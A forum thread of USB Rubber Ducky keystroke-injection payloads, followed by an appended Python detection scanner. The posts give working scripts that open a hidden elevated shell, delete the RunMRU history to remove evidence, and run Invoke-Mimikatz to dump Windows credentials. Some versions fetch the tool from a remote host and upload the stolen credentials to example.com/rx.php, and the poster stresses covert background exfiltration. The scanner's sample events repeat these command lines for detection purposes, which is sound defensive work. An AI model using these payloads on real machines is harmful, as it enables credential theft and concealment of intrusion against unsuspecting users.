0x41414141

Active Members · Posts: 7 · Days Won: 1

Posts posted by 0x41414141

  1. 1 hour ago, Bitbot17 said:

    do you have a link for the twinduck firmware?

    also

    does the last script you wrote also contain the scripts to remove evidence? (PowerShell, CMD, and Run command) because I want to try this out on my own computer

    Sure, I recommend you install Git to download all the relevant Rubber Ducky code.  Once you've installed Git, simply run the following command to clone everything:

    git clone https://github.com/hak5darren/USB-Rubber-Ducky.git

    From there, follow the instructions posted @ https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky

    The Twin Duck firmware is located in USB-Rubber-Ducky/Firmware/Images/ -- there are several versions but try c_duck_v2.1.hex

    Yes, the last script also cleans up the evidence.  If you use the script, make sure you download Invoke-Mimikatz.ps1 and copy/rename it on your Twin Duck as im.ps1; you'll also need to modify the drive volume label to read DUCK.


  2. Here's a version for the Twin Duck.  Make sure you leave the ducky plugged in long enough for the creds file to be written in the background.

    DELAY 1000
    GUI r
    DELAY 500
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    ENTER
    DELAY 2000
    ALT y
    DELAY 1000
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d
    ENTER
    DELAY 500
    STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
    ENTER

  3. On 10/25/2016 at 7:44 AM, Us3rnotfound said:

    Have the brand new device and the encoder program, that's about it.

    In that case you'll need to flash your firmware to a composite edition (i.e. c_duck_v2.1.hex) to function as a Twin Duck (both a USB drive and HID device).

    Here is a hybrid script that will work on your current default firmware.  It will download the PowerShell script from a remote web server and save the Mimikatz output to the local machine in the %temp% folder.

    DELAY 1000
    GUI r
    DELAY 500
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    ENTER
    DELAY 2000
    ALT y
    DELAY 1000
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://paste.ee/r/Xopop');Invoke-Mimikatz -DumpCreds|Out-File '%temp%\mimikatz.txt';"&exit
    ENTER

    I'll follow up with another version for the Twin Duck firmware.

  4. I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly.  Feel free to use the techniques with other payloads.

    Once the FE (white/yellow) command prompt closes you can remove the Rubber Ducky and the script will continue to exfiltrate creds in the background.

    DELAY 1000
    GUI r
    DELAY 500
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
    ENTER
    DELAY 2000
    ALT y
    DELAY 1000
    STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit
    ENTER
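Added detection example, not part of this thread or of the Rubber Ducky project: a small Python scanner that runs over process-creation command lines (constructed sample events in a simplified Sysmon/4688-like shape with host, pid, image and cmdline fields) and flags the traits the three payloads above have in common: a no-profile, non-interactive, hidden-window PowerShell with execution-policy bypass, the IEX/DownloadString download cradle, Invoke-Mimikatz -DumpCreds, and the reg delete of the Explorer RunMRU key. The weak traits also show up in legitimate administration, so they only count in combination; the three strong ones count on their own. The rule names, the event shape and the threshold are assumptions of this example.

```python
import re

# Command-line traits (constructed heuristics, not a vendor ruleset).
# Weak ones appear in legitimate admin scripts too, so they only count
# in combination; strong ones are sufficient on their own.
RULES = [
    ("hidden_window",     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("exec_bypass",       re.compile(r"-(?:ex|ep|exec|executionpolicy)\s+bypass", re.I)),
    ("noninteractive",    re.compile(r"-noni\w*", re.I)),
    ("noprofile",         re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("download_cradle",   re.compile(r"(?:iex|invoke-expression).*?downloadstring\(", re.I)),
    ("runmru_cleared",    re.compile(r"reg\s+delete\s+\S*\\RunMRU", re.I)),
    ("credential_dumper", re.compile(r"invoke-mimikatz|-dumpcreds", re.I)),
]
STRONG = {"download_cradle", "runmru_cleared", "credential_dumper"}
WEAK_THRESHOLD = 3  # assumption: three or more weak traits together is enough


def indicators(cmdline):
    """Return the names of every rule that matches this command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def is_suspicious(hits):
    """A strong indicator alone, or a pile-up of weak ones, flags the event."""
    return bool(STRONG & set(hits)) or len(hits) >= WEAK_THRESHOLD


def scan_events(events):
    """Run the rules over process-creation events and return the flagged ones."""
    findings = []
    for ev in events:
        hits = indicators(ev["cmdline"])
        if is_suspicious(hits):
            findings.append({"host": ev["host"], "pid": ev["pid"],
                             "image": ev["image"], "indicators": hits})
    return findings


# Constructed sample events in a simplified process-creation shape.
# Events 1-3 mirror the chain the payloads above produce: the hidden
# elevated launcher, the cmd child that clears the Run-dialog history,
# and the PowerShell that pulls and runs the script. Events 0 and 4 are
# ordinary admin usage that must not fire.
SAMPLE_EVENTS = [
    {"host": "WS01", "pid": 4112, "image": "powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command Get-Date'},
    {"host": "WS02", "pid": 5120, "image": "powershell.exe",
     "cmdline": r'powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -Verb runAs"'},
    {"host": "WS02", "pid": 5136, "image": "cmd.exe",
     "cmdline": r'cmd /t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f'},
    {"host": "WS02", "pid": 5150, "image": "powershell.exe",
     "cmdline": r"""powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');Invoke-Mimikatz -DumpCreds"&exit"""},
    {"host": "SRV01", "pid": 2200, "image": "powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1'},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['host']} pid={f['pid']} {f['image']}: {', '.join(f['indicators'])}")
```

Running it flags the three WS02 events and leaves the two admin command lines alone. The RunMRU deletion is worth its own strong rule: wiping the Run-dialog history is rare in normal use, and it fires even when the rest of the chain is obfuscated or split across processes. Because the whole sequence survives only as long as the script keeps running, command-line logging at process creation (rather than later file or network artifacts) is what captures it.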